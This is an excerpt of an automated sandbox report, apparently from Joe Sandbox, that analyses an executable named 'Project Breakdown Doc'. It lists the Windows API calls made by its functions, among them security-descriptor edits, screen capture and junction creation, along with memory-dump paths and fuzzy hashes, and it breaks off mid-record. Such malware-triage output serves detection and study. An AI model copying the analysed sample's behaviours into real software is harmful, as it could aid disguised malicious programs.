                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C9C518
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C528
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C9C52E
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C9C54F
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C9C569
                                                  • GetWindowRect.USER32(?,?), ref: 00C9C572
                                                  • SetWindowTextW.USER32(?,?), ref: 00C9C5DD
                                                  • GetDesktopWindow.USER32 ref: 00C9C5E3
                                                  • GetWindowRect.USER32(00000000), ref: 00C9C5EA
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C9C636
                                                  • GetClientRect.USER32(?,?), ref: 00C9C643
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C9C668
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9C693
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 97023c3c430dffcd9fcfc8b77b0444f24fa3cddf6b05e2da6a363b311db6c1bb
                                                  • Instruction ID: dc446959c88c1d63cb78921492124e572fc2f0c9ed586bb0dc71bdec629cf2f1
                                                  • Opcode Fuzzy Hash: 97023c3c430dffcd9fcfc8b77b0444f24fa3cddf6b05e2da6a363b311db6c1bb
                                                  • Instruction Fuzzy Hash: 07514A71A00709AFDB20DFA8DD89F6EBBB5FF04705F00492CF696A25A0C774AA15DB50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CCA4C8
                                                  • DestroyWindow.USER32(?,?), ref: 00CCA542
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CCA5BC
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CCA5DE
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCA5F1
                                                  • DestroyWindow.USER32(00000000), ref: 00CCA613
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C40000,00000000), ref: 00CCA64A
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCA663
                                                  • GetDesktopWindow.USER32 ref: 00CCA67C
                                                  • GetWindowRect.USER32(00000000), ref: 00CCA683
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CCA69B
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CCA6B3
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: f843b3024668c8b13d271c36dba0cd05d130bd6a7fc2c1b28490eb19ff616890
                                                  • Instruction ID: ddd736099ae2f5609defd1160a02d157167ce1f72f0c0a74902871ce792e24ac
                                                  • Opcode Fuzzy Hash: f843b3024668c8b13d271c36dba0cd05d130bd6a7fc2c1b28490eb19ff616890
                                                  • Instruction Fuzzy Hash: AB717971140209AFD720CF28DC49F6A7BE6FB88308F08452DF995872A0D771EA56DB66
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00CCC917
                                                    • Part of subcall function 00CCADF1: ClientToScreen.USER32(?,?), ref: 00CCAE1A
                                                    • Part of subcall function 00CCADF1: GetWindowRect.USER32(?,?), ref: 00CCAE90
                                                    • Part of subcall function 00CCADF1: PtInRect.USER32(?,?,00CCC304), ref: 00CCAEA0
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCC980
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CCC98B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CCC9AE
                                                  • _wcscat.LIBCMT ref: 00CCC9DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CCC9F5
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCCA0E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCCA25
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCCA47
                                                  • DragFinish.SHELL32(?), ref: 00CCCA4E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CCCB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 03221605dfcea72ed07fc96470aec960d77c155efefc353b9143b7bb1f3ea175
                                                  • Instruction ID: ac1a1cc25010f5f50030cacf2115b8c7796e2c4e0ed45ccce2ed405fa6efa388
                                                  • Opcode Fuzzy Hash: 03221605dfcea72ed07fc96470aec960d77c155efefc353b9143b7bb1f3ea175
                                                  • Instruction Fuzzy Hash: F1614B71108305AFC711DF64CC85EAFBBE9FF88750F000A2DF595962A1DB709A49DB62
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CC46AB
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC46F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: 8bf565ff535d5a5431766cd5a04ad8ef0b6a2394622c13379eb49b331aca1793
                                                  • Instruction ID: 1be549af0d377ba252cbf024508e56abc6003114bcb1c2024f35443ec0acd260
                                                  • Opcode Fuzzy Hash: 8bf565ff535d5a5431766cd5a04ad8ef0b6a2394622c13379eb49b331aca1793
                                                  • Instruction Fuzzy Hash: D9915D746047159BCB18EF10C461B6EB7A5FF94314F14845CF8966B7A2CB30ED4AEB82
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CCBB6E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CC6D80,?), ref: 00CCBBCA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCBC03
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CCBC46
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCBC7D
                                                  • FreeLibrary.KERNEL32(?), ref: 00CCBC89
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CCBC99
                                                  • DestroyIcon.USER32(?), ref: 00CCBCA8
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CCBCC5
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CCBCD1
                                                    • Part of subcall function 00C6313D: __wcsicmp_l.LIBCMT ref: 00C631C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: f51f4511684a2da0c627c016daae7b05a5e27d0b9a774641e049e5c77fceafab
                                                  • Instruction ID: ae4e62e5f7510b4a53a6d5cde063964881e15d9ab26c0976d2db6e761eb650ab
                                                  • Opcode Fuzzy Hash: f51f4511684a2da0c627c016daae7b05a5e27d0b9a774641e049e5c77fceafab
                                                  • Instruction Fuzzy Hash: 8461B171A00619BAEB14DFA4CC86FBE7BA8FB08711F104119F925D61D0DB75AE90DBA0
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CAA636
                                                  • GetDriveTypeW.KERNEL32 ref: 00CAA683
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA6CB
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA702
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAA730
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 41f6fc307a8005f5be00ac27bfe0ddfc38d46d05261c3e227e01f96c0194a7a4
                                                  • Instruction ID: 32d7e2bcd41a3184c0cf2aeeb50b306d6f58f426deade7e48b52e4adb095a4af
                                                  • Opcode Fuzzy Hash: 41f6fc307a8005f5be00ac27bfe0ddfc38d46d05261c3e227e01f96c0194a7a4
                                                  • Instruction Fuzzy Hash: A75139B51083059FC700EF20C88196BB7F4FF98718F14496DF89A972A1DB31AE0ADB52
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CAA47A
                                                  • __swprintf.LIBCMT ref: 00CAA49C
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CAA4D9
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CAA4FE
                                                  • _memset.LIBCMT ref: 00CAA51D
                                                  • _wcsncpy.LIBCMT ref: 00CAA559
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CAA58E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CAA599
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00CAA5A2
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CAA5AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: f469af7a6cef0a45f35c32be7d550bb20b623da3b41ef4146df32e74285dd722
                                                  • Instruction ID: 64ddd05e21ee2f5dd136cc3f0e793109df387059cb0cf7a3085f6491903e86c7
                                                  • Opcode Fuzzy Hash: f469af7a6cef0a45f35c32be7d550bb20b623da3b41ef4146df32e74285dd722
                                                  • Instruction Fuzzy Hash: 68319DB190020AABDB219BA0DC48FEF73BDEF89705F1040BAFA18D2160E77097458B25
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                  • String ID:
                                                  • API String ID: 884005220-0
                                                  • Opcode ID: 711c1c05ceb6d148bbc0d8f62c8f67417ae5cf8ba636b3eef10dc1b0d5afb139
                                                  • Instruction ID: 3c3989b5a413e526309893cc710e1960d5bbdb561f362f39d0e39eab94fa445e
                                                  • Opcode Fuzzy Hash: 711c1c05ceb6d148bbc0d8f62c8f67417ae5cf8ba636b3eef10dc1b0d5afb139
                                                  • Instruction Fuzzy Hash: EE612572900301AFDB215F64D842F6D77A5EF95321F14C215E829DB2D1DB35CA80D7A3
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00CADC7B
                                                  • _wcscat.LIBCMT ref: 00CADC93
                                                  • _wcscat.LIBCMT ref: 00CADCA5
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CADCBA
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CADCCE
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00CADCE6
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CADD00
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CADD12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 1bfef278218f2bb6e06f8422533712604624296f165fd548d768b9244facce64
                                                  • Instruction ID: 429db7ce4d4bbb982ec139d85bc5dadef45e81fc9cc538a6e5d38ea4f895db0f
                                                  • Opcode Fuzzy Hash: 1bfef278218f2bb6e06f8422533712604624296f165fd548d768b9244facce64
                                                  • Instruction Fuzzy Hash: AD8194715043429FC724DF64C8859AAB7E4BB8A318F15882EF89BC7650E730DA45DB62
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CCC4EC
                                                  • GetFocus.USER32 ref: 00CCC4FC
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00CCC507
                                                  • _memset.LIBCMT ref: 00CCC632
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CCC65D
                                                  • GetMenuItemCount.USER32(?), ref: 00CCC67D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00CCC690
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CCC6C4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CCC70C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CCC744
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CCC779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: e653af0fa6dfa29e93a22b9fd80b6abf792afff9bc6bc2b811ed630bd1dbdf1b
                                                  • Instruction ID: 2051b167af347123c88f57183d0813eb72c4fdc2ce428fd48530b06e89969398
                                                  • Opcode Fuzzy Hash: e653af0fa6dfa29e93a22b9fd80b6abf792afff9bc6bc2b811ed630bd1dbdf1b
                                                  • Instruction Fuzzy Hash: 2D814970608301AFDB10CF24C9C5F6BBBE9EB88314F00492DF9A997291D770DA55DBA2
                                                  APIs
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                    • Part of subcall function 00C9874A: GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                    • Part of subcall function 00C9874A: GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                    • Part of subcall function 00C9874A: HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                    • Part of subcall function 00C987E7: GetProcessHeap.KERNEL32(00000008,00C98240,00000000,00000000,?,00C98240,?), ref: 00C987F3
                                                    • Part of subcall function 00C987E7: HeapAlloc.KERNEL32(00000000,?,00C98240,?), ref: 00C987FA
                                                    • Part of subcall function 00C987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98240,?), ref: 00C9880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C98458
                                                  • _memset.LIBCMT ref: 00C9846D
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9848C
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C9849D
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C984DA
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C984F6
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C98513
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C98522
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C98529
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9854A
                                                  • CopySid.ADVAPI32(00000000), ref: 00C98551
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98582
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C985A8
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C985BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 35d648f84094174a006ed9a0583073ffbe7ac928c945398af166b8f4070e8dbe
                                                  • Instruction ID: 851bbb74fbbf4cc809ac1af77d6b88049a1289f4b7260033459e4ddaeb952830
                                                  • Opcode Fuzzy Hash: 35d648f84094174a006ed9a0583073ffbe7ac928c945398af166b8f4070e8dbe
                                                  • Instruction Fuzzy Hash: 6C611971900209AFDF10DFA4DC49EAEBBB9FF05700F14816AF925A7291DB319A19DF60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00CB76A2
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CB76AE
                                                  • CreateCompatibleDC.GDI32(?), ref: 00CB76BA
                                                  • SelectObject.GDI32(00000000,?), ref: 00CB76C7
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CB771B
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CB7757
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CB777B
                                                  • SelectObject.GDI32(00000006,?), ref: 00CB7783
                                                  • DeleteObject.GDI32(?), ref: 00CB778C
                                                  • DeleteDC.GDI32(00000006), ref: 00CB7793
                                                  • ReleaseDC.USER32(00000000,?), ref: 00CB779E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: de87cde88544d4b11fd50611c47298d500b58a0fa79c418a0e045479631a80cd
                                                  • Instruction ID: db590cea3e2c6718440a5ede3adb83c77b40ec53053ea9b757fb50cb441c035f
                                                  • Opcode Fuzzy Hash: de87cde88544d4b11fd50611c47298d500b58a0fa79c418a0e045479631a80cd
                                                  • Instruction Fuzzy Hash: E0512875904209EFDB15CFA8CC89FEEBBB9EF48710F14852DF95AA7210D731A9418B60
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00CCFB78), ref: 00CAA0FC
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CAA11E
                                                  • __swprintf.LIBCMT ref: 00CAA177
                                                  • __swprintf.LIBCMT ref: 00CAA190
                                                  • _wprintf.LIBCMT ref: 00CAA246
                                                  • _wprintf.LIBCMT ref: 00CAA264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
